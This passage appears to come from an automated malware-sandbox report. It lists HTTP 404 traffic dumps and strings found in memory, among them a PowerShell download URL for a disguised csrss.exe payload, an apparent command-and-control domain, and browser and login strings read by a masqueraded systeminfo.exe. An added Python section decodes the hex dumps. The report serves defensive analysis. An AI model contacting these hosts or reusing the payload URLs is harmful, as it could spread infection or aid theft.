74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 
49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE a
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:15:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:15:19 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:15:23 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
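The "Data Raw:" fields above are the literal bytes the servers sent back, still wrapped in HTTP/1.1 chunked framing and, for the Cloudflare-fronted host, gzip. Reading them as-is tells you almost nothing, and the "Data Ascii" column only renders the compressed bytes. The following Python is an added example (not part of this report or of Joe Sandbox) that converts such a dump to bytes, strips the chunk framing, and inflates the body. The sample bytes are copied from the 21:14:41 GMT response above (a single complete chunk of 0xa7 = 167 gzip bytes); the truncated case is constructed by cutting that sample. Function and field names are this example's own.

```python
"""Decode a Joe Sandbox 'Data Raw:' HTTP response dump.

Added example, not part of this report: turns the hex dump into bytes, strips
HTTP/1.1 chunked transfer framing, and gunzips the body so the page the server
actually answered with can be read. Handles dumps that were cut mid-chunk.
"""
import re
import zlib
from dataclasses import dataclass

# Copied from the 21:14:41 GMT response in this report:
# "a7\r\n" chunk header, 167 bytes of gzip data, "\r\n" chunk terminator.
NGINX_404_GZ_HEX = """
61 37 0d 0a
1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85
6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4
b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b
11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5
77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27
a7 bf a8 24 02 00 00
0d 0a
"""

# chunk-size in hex, optional ";extensions", CRLF
CHUNK_HDR = re.compile(rb"([0-9A-Fa-f]+)(?:;[^\r\n]*)?\r\n")


@dataclass
class Decoded:
    chunk_sizes: list   # sizes declared by each chunk header seen
    truncated: bool     # the dump ended inside a declared chunk
    is_gzip: bool       # payload starts with the gzip magic 1f 8b
    complete: bool      # gzip trailer reached (zlib verified CRC32 and ISIZE)
    text: bytes         # decompressed body, as far as the bytes allowed


def hexdump_to_bytes(hex_text: str) -> bytes:
    """'61 37 0d 0a ...' -> b'a7\\r\\n...'; spaces and newlines are ignored."""
    return bytes.fromhex("".join(hex_text.split()))


def dechunk(data: bytes):
    """Remove chunked transfer framing. A dump cut mid-chunk is kept and flagged."""
    payload, sizes, pos, truncated = bytearray(), [], 0, False
    while pos < len(data):
        m = CHUNK_HDR.match(data, pos)
        if not m:                      # not a chunk header: keep the tail, flag it
            payload += data[pos:]
            truncated = True
            break
        size = int(m.group(1), 16)
        pos = m.end()
        if size == 0:                  # last-chunk; trailers, if any, are ignored
            break
        chunk = data[pos:pos + size]
        truncated |= len(chunk) < size
        payload += chunk
        sizes.append(size)
        pos += size + 2                # skip the CRLF that ends the chunk data
    return bytes(payload), sizes, truncated


def inflate(payload: bytes):
    """Gunzip as far as possible; a truncated stream yields a partial page and eof=False."""
    if not payload.startswith(b"\x1f\x8b"):
        return payload, True
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)   # +16: expect a gzip wrapper
    return d.decompress(payload), d.eof


def decode_data_raw(hex_text: str, chunked: bool = True) -> Decoded:
    """Full pipeline: hex -> bytes -> (dechunk) -> (gunzip)."""
    raw = hexdump_to_bytes(hex_text)
    payload, sizes, truncated = dechunk(raw) if chunked else (raw, [], False)
    text, eof = inflate(payload)
    return Decoded(sizes, truncated, payload.startswith(b"\x1f\x8b"), eof, text)


if __name__ == "__main__":
    r = decode_data_raw(NGINX_404_GZ_HEX)
    print(r.chunk_sizes, r.truncated, r.complete, len(r.text))
    print(r.text.decode("latin-1"))
```

The gzip trailer of that chunk declares an uncompressed size of 0x224 = 548 bytes, which is exactly the size of the plain nginx 404 page the same host returned at 21:14:49 (chunk size "224"), so the compressed and uncompressed responses are the same stock error page. For a dump with Content-Length instead of chunked framing (the Apache responses), pass chunked=False. When the report has cut a dump short, as with the 21:14:19 response, the truncated flag is set and text holds whatever prefix could be inflated.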
                        Source: powershell.exe, 00000003.00000002.1354721983.0000000005559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.26.143/470/csrss.ex
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.26.143/470/csrss.exe
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: svchost.exe, 00000004.00000002.2818601575.000001E5BD600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                        Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                        Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                        Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD84D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                        Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crl/csca2020.crl0I
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crl/rootca2020.crl0?
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crl/tsca2020.crl0?
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crt/csca2020.crt05
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crt/rootca2020.crt07
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crt/tsca2020.crt05
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/csp0
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000003.00000002.1354721983.0000000005071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3629881400.00000000053C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.031233793.xyz
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3629881400.00000000053C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.031233793.xyz/63vw/
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: csrss.exe, 0000000C.00000003.1284464034.000000007EBB9000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1354702369.0000000021EFE000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1286992439.0000000000889000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007F039000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000000.1287327229.0000000000416000.00000002.00000001.01000000.0000000D.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.00000000008E9000.00000040.00000400.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3629285159.00000000048FC000.00000004.10000000.00040000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3625591179.0000000002499000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3628090951.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.1850984943.000000002A91C000.00000004.80000000.00040000.00000000.sdmp, iaoqralA.pif.12.drString found in binary or memory: http://www.pmail.com
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                        Source: powershell.exe, 00000003.00000002.1354721983.0000000005071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.4.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.4.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.4.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD8C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: systeminfo.exe, 00000015.00000002.3625591179.00000000024DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: systeminfo.exe, 00000015.00000002.3625591179.00000000024DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: systeminfo.exe, 00000015.00000002.3625591179.00000000024BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033s;
Source: systeminfo.exe, 00000015.00000002.3625591179.00000000024BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: systeminfo.exe, 00000015.00000003.1736742288.000000000730D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000003.00000002.1381364951.000000000792F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/Author=
Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.4.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
